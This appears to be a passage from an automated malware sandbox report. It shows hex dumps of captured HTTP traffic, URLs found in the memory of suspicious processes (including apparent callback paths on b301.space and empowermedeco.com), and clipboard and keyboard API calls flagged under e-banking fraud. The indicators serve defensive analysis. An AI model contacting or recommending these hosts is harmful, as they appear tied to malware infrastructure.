ba 79 b3 75 c9 84 10 9a 49 c2 8c 49 cf 05 79 b3 34 9f 4d a5 6c 0e b8 e7 74 45 18 19 b7 c2 72 b5 04 7a 11 04 32 38 e5 84 1a 5b c2 9c 30 b0 a1 c9 0c 23 18 3a 0d de 61 d4 55 c1 fb c2 72 11 12 c0 9b 48 23 e1 a9 65 2b 4e ca ca 57 b8 77 0a 19 b5 91 22 b1 13 99 b7 f8 16 d7 c2 94 5a 5b 3c 60 36 c5 06 8c 50 5a 7c 69 65 65 f9 4a 69 ea 07 74 d7 e9 00 94 9c ae 23 02 22 29 ad 4d ad 62 6a 80 23 e7 d2 60 07 92 04 26 db 75 ba 27 02 a0 a3 82 44 56 1c b0 48 1e 2b 01 4a 7f 3a 8d 04 04 31 fd 67 0d 78 d0 73 3c cb 83 19 4b ad f8 af 69 e0 b0 f8 7b 84 53 3e bc 8e 54 d4 dd 8f 0f e2 27 2c be af 03 ab c1 93 b8 20 7c 0a 01 50 81 e8 01 60 d6 23 b0 05 14 5b 6d 80 fb 26 34 a7 81 bd 5d a7 30 2b e9 38 f3 a4 c6 56 e6 49 80 25 bc 08 3f 10 62 f0 26 11 c0 df 35 83 52 c2 a1 15 ff 93 42 dd 18 df 19 df 6d 98 bc d5 30 7d fc e9 fd 03 73 b9 e3 4d d7 f0 93 1d 77 9c ad c2 60 dd 93 a4 65 9b 53 18 20 70 67 29 2c 6b 3b 00 da 41 82 56 23 a3 31 c5 32 37 db b2 48 7d 50 d9 0b 60 51 82 3b d8 c8 43 a3 d1 0e 5a f1 bf 94 86 bf 19 df 8d 0f 01 60 fb e3 cf 59 fc 4c 29 f9 41 fc 48 c1 d7 51 7c 58 63 e3 4f c7 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 02 Aug 2024 11:54:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f 39 62 db 97 41 94 a1 df 76 3a 51 bf d9 11 5b 8e 2d ea ea a2 e6 78 4e e4 70 b7 1e da dc 15 cd a5 3c 8b 44 a0 0c 07 ee 93 96 22 27 72 45 2b fe 7a 7c 27 7e 1a 3f 64 f8 ef 30 fe 36 3e 1a ef 8f 3f c6 ef 83 f1 1f e3 a3 f8 88 c5 0f 70 f7 31 6e 3d 89 0f 16 bc 76 e8 af e5 d5 c6 92 19 5f c4 0f 1b a6 66 d9 70 1d 6f 93 05 c2 6d 96 c2 68 e4 8a b0 2f 04 36 30 10 1d 87 37 4b dc 85 29 fa 81 e8 36 4b a9 e2 94 ff 19 76 18 42 2a 35 a3 d5 96 9d 11 bb 7d 81 65 3e 6d 6e 6f f6 02 39 f4 3a ab ec 67 6f ae d0 bf b5 09 c1 5e c3 d4 13 33 6b 3b f0 cf c9 4a 5d 0e 75 49 cf c0 57 89 69 e7 57 a6 35 77 ea 8a 0e 0b db 81 e3 47 2d f3 52 e3 e2 c6 eb 6f 5c bb 7e 6d e3 92 79 61 1b 8e 2d b7 8d 28 c0 e2 ef 2b 82 b7 24 ef b0 26 eb 0e 3d 3b 72 a4 57 a9 de de 5b bb 60 5e ba 79 b3 75 c9 84 10 9a 49 c2 8c 49 cf 05 79 b3 34 9f 4d a5 6c 0e b8 e7 74 45 18 19 b7 c2 72 b5 04 7a 11 04 32 38 e5 84 1a 5b c2 9c 30 b0 a1 c9 0c 23 18 3a 0d de 61 d4 55 c1 fb c2 72 11 12 c0 9b 48 23 e1 a9 65 2b 4e ca ca 57 b8 77 0a 19 b5 91 22 b1 13 99 b7 f8 16 d7 c2 94 5a 5b 3c 60 36 c5 06 8c 50 5a 7c 69 65 65 f9 4a 69 ea 07 74 d7 e9 00 94 9c ae 23 02 22 29 ad 4d ad 62 6a 80 23 e7 d2 60 07 92 04 26 db 75 ba 27 02 a0 a3 82 44 56 1c b0 48 1e 2b 01 4a 7f 3a 8d 04 04 31 fd 67 0d 78 d0 73 3c cb 83 19 4b ad f8 af 69 e0 b0 f8 7b 84 53 3e bc 8e 54 d4 dd 8f 0f e2 27 2c be af 03 ab c1 93 b8 20 7c 0a 01 50 81 e8 01 60 d6 23 b0 05 14 5b 6d 80 fb 26 34 a7 81 bd 5d a7 30 2b e9 38 f3 a4 c6 56 e6 49 80 25 bc 08 3f 10 62 f0 26 11 c0 df 35 83 52 c2 a1 15 ff 93 42 dd 18 df 19 df 6d 98 bc d5 30 7d fc e9 fd 03 73 b9 e3 4d d7 f0 93 1d 77 9c ad c2 60 dd 93 a4 65 9b 53 18 20 70 67 29 2c 6b 3b 00 da 41 82 56 23 a3 31 c5 32 37 db b2 48 7d 50 d9 0b 60 51 82 3b d8 c8 43 a3 d1 0e 5a f1 bf 94 86 bf 19 df 8d 0f 01 60 fb e3 cf 59 fc 4c 29 f9 41 fc 48 c1 d7 51 7c 58 63 e3 4f c7 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 02 Aug 2024 11:54:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 36 33 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 67 65 2d 74 79 70 65 3d 22 70 61 72 6b 69 6e 67 2d 63 72 65 77 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 2f 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 79 6f 75 72 6d 69 6e 65 2e 72 75 2f 69 2f 70 61 72 6b 69 6e 67 2f 67 6c 6f 62 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 32 38 30 35 34 32 39 32 35 34 37 36 36 37 35 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 65 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 80 d0 be d0 ba 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d0 b8 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 26 6e 62 73 70 3b 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 20 d0 b8 d1 81 d1 82 d1 91 d0 ba 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2d 63 72 65 77 2e 63 73 73 22 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 35 45 35 45 35 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 02 Aug 2024 11:54:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space/
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://yourmine.ru/i/parking/glob_parking.png
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru/
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.2448054962.000000000767A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033;1Y
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rakkoma.com/
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004C5A000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.00000000046BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?blWd=mxnR
            Source: netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000484C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-55552418-3
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MLXKCD66
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000042EE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.com/buy/domains/?query=www.b301.space&utm_source=www.b301.space&utm_medium=expired&u
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medi
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&u
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.value-domain.com/
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0074EAFF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0074ED6A
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0074EAFF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0073AA57
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00769576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00769576

            E-Banking Fraud

            barindex
